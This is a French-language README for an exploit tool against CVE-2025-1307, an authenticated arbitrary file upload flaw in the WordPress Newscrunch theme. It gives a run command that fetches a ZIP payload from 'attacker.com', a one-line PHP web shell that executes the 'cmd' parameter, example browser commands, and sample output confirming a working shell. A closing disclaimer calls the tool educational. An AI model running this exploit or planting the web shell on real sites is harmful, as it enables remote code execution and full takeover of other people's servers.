
Newscrunch <= 1.8.4 - Téléchargement de fichier arbitraire authentifié (Subscriber+)
Cet exploit cible une vulnérabilité critique (CVE-2025-1307) dans le thème WordPress Newscrunch. La faille permet aux utilisateurs authentifiés (à partir du rôle Abonné) de téléverser des fichiers arbitraires en raison de l'absence de contrôles de capacités dans la fonction newscrunch_install_and_activate_plugin(). Cela peut conduire à une exécution de code à distance (RCE), compromettant complètement le site WordPress affecté.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HExploitabilité : nécessite un compte WordPress valide avec des privilèges d'abonné ou supérieurs.
✅ Exploitation automatisée de CVE-2025-1307
✅ Détection automatique de la version vulnérable du thème
✅ Extraction et exécution automatiques de la charge utile ZIP
✅ Récupération dynamique du nom du fichier shell depuis le ZIP
✅ Vérification automatique de la disponibilité du shell après exploitation
✅ Journalisation claire et structurée pour le débogage
Assurez-vous d'avoir Python 3.x installé et installez les dépendances requises :
pip install requests urllib3 packaging
python CVE-2025-1307.py -u "http://target" -un "admin" -p "password" -pl "http://attacker.com/malicious.zip"
Exploit for CVE-2025-1307 in WordPress Newscrunch Theme By Nxploit | Khaled Alenazi
options:
-h, --help show this help message and exit
-u URL, --url URL Target WordPress URL (e.g., https://example.com)
-un USERNAME, --username USERNAME
WordPress username
-p PASSWORD, --password PASSWORD
WordPress password
-pl PAYLOAD_URL, --payload_url PAYLOAD_URL
Malicious file URL to upload
Une fois le shell téléversé avec succès, il permet l'exécution de commandes à distance sur le système cible. Le fichier shell doit être placé dans une archive ZIP ; il sera extrait automatiquement lors de l'exploitation.
Assurez-vous que votre shell PHP (shell.php) se trouve dans une archive ZIP. Téléversez ensuite le fichier ZIP à l'aide de l'exploit.
<?php system($_GET['cmd']); ?>
Vous pouvez exécuter des commandes système via le navigateur en ajoutant le paramètre cmd à l'URL du shell :
http://target/wp-content/plugins/shell.php?cmd=whoami
[+] Newscrunch theme version detected: 1.8.4
[+] Exploitation is possible, proceeding...
[*] Logging in...
[+] Logged in successfully.
[*] Uploading and extracting payload...
[+] Exploit executed successfully. Malicious file uploaded.
[*] Checking if shell is accessible: http://target/wp-content/plugins/U.php
[+] Shell successfully uploaded and accessible: http://target/wp-content/plugins/U.php?cmd=ls
Cet outil est destiné uniquement à des fins éducatives et de recherche en sécurité. L'exploitation non autorisée de vulnérabilités est illégale et punie par la loi. L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés par cet outil. Utilisez-le de manière responsable.
Par : Nxploit | Khaled Alenazi